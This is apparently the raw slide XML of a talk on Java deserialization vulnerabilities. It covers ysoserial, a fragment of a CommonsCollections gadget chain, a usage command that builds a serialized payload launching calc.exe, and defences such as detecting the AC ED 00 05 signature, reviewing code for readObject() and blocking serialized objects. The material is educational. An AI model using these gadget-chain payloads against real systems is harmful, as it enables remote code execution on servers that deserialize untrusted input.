              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>InvocationHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> handler = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Gadgets.createMemoizedInvocationHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mapProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Reflections.setFieldValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>transformerChain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>iTransformers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>", transformers); // arm with actual transformer chain					</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104384000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err="1" smtClean="0"/>
              <a:t>ysoserial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496128" y="1585397"/>
            <a:ext cx="7626350" cy="4095750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Tool to create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>serialized object that executes the command provided</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/frohoff/ysoserial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Usage:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java -jar ysoserial-0.0.3-all.jar CommonsCollections1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc.exe &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execCalc.ser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525312" y="5223754"/>
            <a:ext cx="1138119" cy="243191"/>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4388350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Payloads Possible?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YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>soserial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> contains 5 more based on commons collections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trend is to find them in libraries more than in the language core</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contrast Security has released some tools to find gadget functions meeting certain criteria    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>github.com/Contrast-Security-OSS/serialbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nahsra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Arshan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Dabirsiaghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) for a new gadget in the next week or so based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XStream</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396906892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Am I Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447488" y="1449205"/>
            <a:ext cx="7626350" cy="1866900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deserialization vulnerabilities require two parts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1363663" lvl="1" indent="-514350">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An interface that reads a serialized object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1363663" lvl="1" indent="-514350">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A payload that does bad things when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instantiated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </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6926" y="3361747"/>
            <a:ext cx="4568544" cy="2518410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24316122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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Deserializing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544768" y="1619250"/>
            <a:ext cx="7626350" cy="638175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Signs in Network Traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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8963" y="2177367"/>
            <a:ext cx="7031768" cy="1680258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938963" y="4210050"/>
            <a:ext cx="7204912" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Java Serialized Objects start with the hex signature “AC ED 00 05”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Class names appear in plain text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2149240"/>
            <a:ext cx="7626096" cy="2286381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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n-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> prove serialized objects were sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAN’T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> prove that they will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> be accepted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219112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t>Am I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Deserializing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544768" y="1683692"/>
            <a:ext cx="7626350" cy="2000250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Might lead to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Difficult to search in 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>party libraries</a:t>
            </a:r>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814" y="3790950"/>
            <a:ext cx="8171766" cy="1251625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388608243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Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463650" y="1405843"/>
            <a:ext cx="7866484" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Block Serialized Objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18237" y="1929718"/>
            <a:ext cx="7997571" cy="2228850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
